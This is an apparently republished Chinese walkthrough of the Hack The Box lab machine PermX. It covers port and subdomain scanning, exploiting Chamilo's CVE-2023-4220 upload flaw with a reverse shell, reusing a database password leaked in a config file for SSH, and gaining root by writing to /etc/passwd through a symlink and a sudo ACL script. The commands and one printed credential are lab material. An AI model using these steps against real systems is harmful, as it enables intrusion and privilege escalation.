HTB-Permx靶机笔记

news/2024/11/15 15:34:14/文章来源:https://www.cnblogs.com/LING5/p/18353142

Permx靶机笔记

概述

permx靶机是HTB的简单靶机,这台靶机整体考验渗透人员的信息搜集能力,可以收只有信息搜集的快速,才能快速拿到它的flag。

整体是比较简单的靶机

靶机连接:https://app.hackthebox.com/machines/PermX

一、nmap扫描

1)端口扫描
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.4s latency).
Not shown: 65495 filtered tcp ports (no-response), 38 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http# Nmap done at Tue Aug  6 09:44:09 2024 -- 1 IP address (1 host up) scanned in 327.15 seconds
2)详细信息扫描
nmap -sT -sV -sC -O -p22,80 -o detail 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.7s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e25c5d8c473ed872f7b4800349866def (ECDSA)
|_  256 1f41028e6b17189ca0ac5423e9713017 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Linux 5.4 (93%), Linux 3.8 (92%), QNAP QTS 4.0 - 4.2 (92%), Linux 5.3 - 5.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug  6 09:57:53 2024 -- 1 IP address (1 host up) scanned in 133.37 seconds

看到``http-title: Did not follow redirect to http://permx.htb`

我们去/etc/hosts文件中绑定域名

sudo vi /etc/hosts

image-20240810220919290

10.10.11.23 permx.htb写进去

二、访问web

http://permx.htb
image-20240810221125311

开始爆破子域名

sudo gobuster dns -d permx.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt                            
[sudo] kali 的密码:                                                                                                               
===============================================================                                                                    
Gobuster v3.6                                                                                                                      
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)                                                                      
===============================================================                                                                    
[+] Domain:     permx.htb                                                                                                          
[+] Threads:    10                                                                                                                 
[+] Timeout:    1s                                                                                                                 
[+] Wordlist:   /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt                                                  
===============================================================                                                                    
Starting gobuster in DNS enumeration mode                                                                                          
===============================================================                                                                    
Found: lms.permx.htbProgress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================

看到结果lms.permx.htb

同样写到/etc/hosts文件中,打开浏览器进行访问。

一个登录窗口,应该是cms。网上找一下有没有漏洞公开信息。同时进行目录爆破,看有没有一些页面信息。

image-20240810221500886
1)目录爆破
sudo gobuster dir -u http://lms.permx.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt===============================================================                 
Gobuster v3.6                                                           
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)         
===============================================================             
[+] Url:                     http://lms.permx.htb                                              
[+] Method:                  GET                                                      
[+] Threads:                 10                                                                
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt        
[+] Negative Status codes:   404                                                                
[+] User Agent:              gobuster/3.6                                                      
[+] Timeout:                 10s                                                                
===============================================================                                  
Starting gobuster in directory enumeration mode                                                   
===============================================================                                                                    
/main                 (Status: 301) [Size: 313] [--> http://lms.permx.htb/main/]                                                   
/web                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/web/]                                                    
/documentation        (Status: 301) [Size: 322] [--> http://lms.permx.htb/documentation/]                                          
/bin                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/bin/]                                                    
/src                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/src/]                                                    
/app                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/app/]                                                    
/vendor               (Status: 301) [Size: 315] [--> http://lms.permx.htb/vendor/]                                                 
/LICENSE              (Status: 200) [Size: 35147]                                                                                  
/plugin               (Status: 301) [Size: 315] [--> http://lms.permx.htb/plugin/]                                                 
/certificates         (Status: 301) [Size: 321] [--> http://lms.permx.htb/certificates/]                                           
Progress: 39913 / 220561 (18.10%)                                                                                                  
/custompages          (Status: 301) [Size: 320] [--> http://lms.permx.htb/custompages/]                                            
/server-status        (Status: 403) [Size: 278] 
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

也没什么有用的路径泄露出来

2)CVE搜索

找到了一个文件上传的漏洞CVE-2023-4220

exploit:https://github.com/Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit

php-reverse-shell:https://pentestmonkey.net/tools/web-shells/php-reverse-shell

三、获得立足点

两个文件下载下来

image-20240810224429389

修改一下reverse.php文件的ip地址和端口

image-20240810224614205

chmod +x chamilo-exp.sh 

image-20240810225104861

成功获得立足点

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-color # 可以用clear清屏

我们在用户目录下发现了mtz用户

image-20240811091221849

四、获得mtz用户权限

find / -name configuration.php 2> /dev/null

image-20240810230645721

找到了chamilo的配置文件,去打开看看

cat /var/www/chamilo/app/config/configuration.php    
cat /var/www/chamilo/plugin/sepe/src/configuration.php

在app目录下的配置文件中,我们看到了数据库的用户名和密码

image-20240811085230001

我们连接数据库

mysql -u chamilo -p03F6lY3uXAP2bkW8

image-20240811090312379

成功进入数据库

image-20240811091257164

这里有admin和password的hash值

用hashcat等工具尝试破解hash值,可惜一无所获

我们想一下,这个数据库的密码03F6lY3uXAP2bkW8 会不会和它ssh用户mtz的密码一样呢 尝试一下

sudo ssh mtz@10.10.11.2303F6lY3uXAP2bkW8

image-20240811091828783

image-20240811092014149

发现用户flag

五、提权到root

sudo -l 看到有一个脚本

image-20240811092307992

#!/bin/bashif [ "$#" -ne 3 ]; then/usr/bin/echo "Usage: $0 user perm file"exit 1
fiuser="$1"
perm="$2"
target="$3"if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then/usr/bin/echo "Access denied."exit 1
fi# Check if the path is a file
if [ ! -f "$target" ]; then/usr/bin/echo "Target must be a file."exit 1
fi/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

因为文件是不可写的,我们只能审计一下这个脚本文件,看看能不能完成提权了。

这里阻止了一些恶意的操作,我们可以尝试链文件

mtz@permx:~:$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~:$ sudo /opt/acl.sh mtz rw /home/mtz/test
mtz@permx:~:$ echo "lingx5::0:0:lingx5:/root:/bin/bash" >> ./test
mtz@permx:~:$ su lingx5root@permx:/home/mtz:#

image-20240811100517163

成功拿到root的flag

总结

  1. 我们用nmap扫描,探测出了目标服务有http和ssh服务,对http服务进行子域名枚举,在它的旁站中,我们发现他是一个cms的架构
  2. 在github上找到了chamilo框架的CVE-2023-4220漏洞,根据github上的教程利用exp,成功后的了www-data用户权限。
  3. 在chamilo框架的配置文件中,我们发现mysql数据库的配置信息,可以成功登陆数据库,但是admin的密码是hash值很难破解。
  4. 我们想到mysql和ssh会不会存在撞库的可能(两者密码是一样的),我们在home目录下发现mtz用户,尝试ssh连接,成功获得mtz用户的权限
  5. 在mtz的sudo列表中看到了/opt/acl.sh文件,通过对shell脚本的审计,我们发现这个脚本可以给``/home/mtz/*的文件赋权限,由此我们利用软连接的方式,获得/etc/passwd`的写权限,成功提权到root。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/781188.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

BMC Genomics | 火龙果的转录组和代谢组分析揭示了果皮和果肉颜色形成的机制

阐明火龙果果肉和果皮变色的候选基因和关键代谢产物,是培育具有优良新口味和高营养价值的火龙果的必要条件。在这里,使用转录组(RNA-Seq)和代谢组分析(UPLC-MS/MS)鉴定了属于两种不同量天尺属物种的三种火龙果的结构和调控基因以及与果皮和果肉颜色相关的关键代谢物。作者综合…

USB协议详解第3讲(USB描述符-设备描述符)

我们第一个学习要点就是USB描述符,所谓描述符其实就是C语言里面的结构体或者数组,数组包含的信息说明当前的设备具有哪些特征。USB描述符有设备描述符、配置描述符、接口描述符、端点描述符、字符串描述符,HID设备有HID描述符、报告描述符和物理描述符。我们先学会每个描述符…

Windows如何保证所有软件在D(其他)盘

Windows如何保证所有软件在D(其他)盘首先使用你电脑有两个固态硬盘就是盘符自己分区也可以 C盘我们只用于电脑的系统资源管理其他所有数据包括默认安装的文件都在D盘或者自定义的盘 win+R 输入 regedit 进入注册表根据下面路径依次点开,找到CurrentVersion,或者复制路径,粘贴…

【笔记】【THM】Malware Analysis(恶意软件分析)

二进制安全入坟【笔记】【THM】Malware Analysis(恶意软件分析) 探索恶意软件的世界,分析恶意软件如何感染系统并造成破坏。 恶意软件分析就像猫捉老鼠的游戏。恶意软件的作者一直在设计新的技术来躲避恶意软件分析师的眼睛,而恶意软件分析师也一直在寻找识别和抵消这些技术…

《逆行人生》电影迅雷下载3.69GB/MP4(百度云磁力资源共享)HD高清版

在光怪陆离的电影世界里,总有一些作品能够触动人心,让人在欢笑与泪水中重新审视生活的意义。《逆行人生》就是这样一部电影,它不仅仅是一部简单的现实题材作品,更是一次对人性光辉和社会现实的深刻探讨。由徐峥执导并主演,这部电影汇聚了冯兵、贾冰、王骁、丁勇岱等众多实…

[图文直播]Windows操作系统部署Jenkins

前言 首先说明一下我为什么选择在Windows操作系统上部署Jenkins是吧,主要基于虽然从长远上看,我是有进行跨平台开发的需求,但至少在可预见的三到五年时间内,我的潜在客户也都是在windows操作系统上。至于跨平台,规划上要有,但正如天龙八部里天龙寺内面对鸠摩智打算拿拈花…

C# 打包

目前打包比较好用的版本是 Advanced_Installer_v16.9.0_Chs .net 4.62 安装的命令行参数 /passive /norestart 安装后启动配置

时间序列分析

平稳性检验 时序图 自相关系数图 纯随机性检验方法性工具 差分运算延迟算子线性差分方程AR模型

Cisco Firepower 4100 Series FTD Software 7.4.2 ASA Software 9.20.3 发布下载 - 思科防火墙系统软件

Cisco Firepower 4100 Series FTD Software 7.4.2 & ASA Software 9.20.3 发布下载 - 思科防火墙系统软件Cisco Firepower 4100 Series FTD Software 7.4.2 & ASA Software 9.20.3 发布下载 - 思科防火墙系统软件 Firepower Threat Defense (FTD) Software 请访问原文链…

Cisco Firepower 2100 Series FTD Software 7.4.2 ASA Software 9.20.3 发布下载 - 思科防火墙系统软件

Cisco Firepower 2100 Series FTD Software 7.4.2 & ASA Software 9.20.3 发布下载 - 思科防火墙系统软件Cisco Firepower 2100 Series FTD Software 7.4.2 & ASA Software 9.20.3 发布下载 - 思科防火墙系统软件 Firepower Threat Defense (FTD) Software 请访问原文链…

进度报告11

(1)1.方法重写2.多态 3.抽象类

工作流之Flowable与SpringBoot结合

目录1 Flowable1.1 flowable-ui部署运行1.2 绘制流程图1.2.1 绘制1.2.2 绘图细节1.2.3 bpmn文件导入1.3 后台项目搭建1.3.1 pom.xml1.3.2 数据库表说明1.4 流程引擎API与服务1.4.1 主要API1.4.2 示例 1 Flowable 1.1 flowable-ui部署运行 flowable-6.6.0 运行 官方demo 参考文档…